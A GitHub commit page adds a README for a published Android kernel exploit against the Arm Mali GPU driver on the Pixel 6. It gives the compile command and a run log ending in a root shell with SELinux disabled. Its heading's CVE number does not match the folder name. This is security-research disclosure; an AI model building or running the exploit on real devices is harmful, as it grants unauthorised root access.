Skip to content

Commit dc4b5a8

Browse files
m-y-mom-y-mo
authored
Merge pull request #724 from github/mali_38181
Blog material
2 parents 9335e32 + acfdbef commit dc4b5a8

6 files changed

Lines changed: 4132 additions & 0 deletions

File tree

SecurityExploits/Android/Mali/CVE_2022_38181/README.md

Lines changed: 41 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,41 @@
1+
## Exploit for CVE-2022-20186
2+
3+
The write up can be found [here](https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug). This is a bug in the Arm Mali kernel driver that I reported in July 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
4+
5+
The exploit is tested on the Google Pixel 6. The original exploit that was sent to Google is included as `hello-jni.c` as a reference and was tested on the July 2022 patch of the Pixel 6. Due to the fact that Pixel 6 cannot be downgraded from Android 13 to Android 12, an updated version of the exploit, `mali_shrinker_mmap.c` is included, which supports various firmware in Android 13, including the December patch, which is the latest affected version. For reference, I used the following command to compile with clang in ndk-21:
6+
7+
```
8+
android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_shrinker_mmap.c -o mali_shrinker_mmap
9+
```
10+
11+
The exploit should be run a couple of minutes after boot and should be fairly reliable. If successful, it should disable SELinux and gain root.
12+
13+
```
14+
oriole:/ $ /data/local/tmp/mali_shrinker_mmap
15+
fingerprint: google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys
16+
failed, retry.
17+
failed, retry.
18+
region freed 51
19+
read 0
20+
cleanup flush region
21+
jit_freed
22+
jit_free commit: 0 0
23+
Found freed_idx 0
24+
Found pgd 20, 769c414000
25+
overwrite addr : 7701100710 710
26+
overwrite addr : 7700f00710 710
27+
overwrite addr : 7701100710 710
28+
overwrite addr : 7700f00710 710
29+
overwrite addr : 7700d00710 710
30+
overwrite addr : 7700f00710 710
31+
overwrite addr : 7700d00710 710
32+
overwrite addr : 7701100fd4 fd4
33+
overwrite addr : 7700f00fd4 fd4
34+
overwrite addr : 7701100fd4 fd4
35+
overwrite addr : 7700f00fd4 fd4
36+
overwrite addr : 7700d00fd4 fd4
37+
overwrite addr : 7700f00fd4 fd4
38+
overwrite addr : 7700d00fd4 fd4
39+
result 50
40+
oriole:/ #
41+
```

0 commit comments

Comments
 (0)